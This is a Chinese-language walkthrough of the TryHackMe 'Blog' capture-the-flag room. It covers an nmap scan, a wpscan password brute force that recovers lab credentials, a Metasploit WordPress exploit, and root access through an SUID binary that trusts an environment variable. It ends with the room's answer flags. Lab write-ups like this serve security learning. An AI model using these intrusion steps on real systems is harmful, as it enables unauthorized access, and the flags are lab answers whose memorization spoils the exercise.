tryhackme–Blog
nmap扫描
nmap -T4 -sS -sV 10.10.223.252 -sC
CMS和版本都知道了,本地查找漏洞
msf有利用脚本
查看参数需要账号密码,用wpscan扫描站点用户
找到两个用户,新建一个用户文件,用于爆破密码
成功爆出密码:kwheel / cutiepie1
wpscan --url http://10.10.150.219/ -U user.txt -P tools/dict/rockyou.txt
回到msf输入用户名密码发现拿不到session,然后把payload换成了正向的shell,成功拿到session,适当换payload这也是一个小技巧
查找user.txt
find / -name *user.txt > 2.txt
cat 2.txt
tmd是假的
sudo -l没有任何收获
查看suid权限的文件和命令,找到一个命令,去查了一下没有这个命令,以为不是关键点,后面实在解不出,看了wp,才知道这就是关键点
find / -type f -perm -u=s 2>/dev/null
执行命令他说我们不是admin,并且为一个64位elf文件,用ltrace查看他引用了哪些函数,看到getenv()函数,就可以知道他与环境变量有关,添加一个环境变量:admin=1,再执行命令权限已经为root,好家伙又学到了一招。
export admin=1
/usr/sbin/checker
接下来我们找user.txt的位置和值,找和bjoel用户有关的文件
find / -user bjoel > 2.txt
cat 2.txt
所以问题的答案:
root.txt
9a0b2b618bef9bfa7ac28c1353d9f318
user.txt
c8421899aae571f7af486492b71a8ab7
Where was user.txt found?
/media/usb
What CMS was Billy using?
Wordpress
What version of the above CMS was being used?
5.0
ps:
个人站点博客:XingHe,欢迎来踩~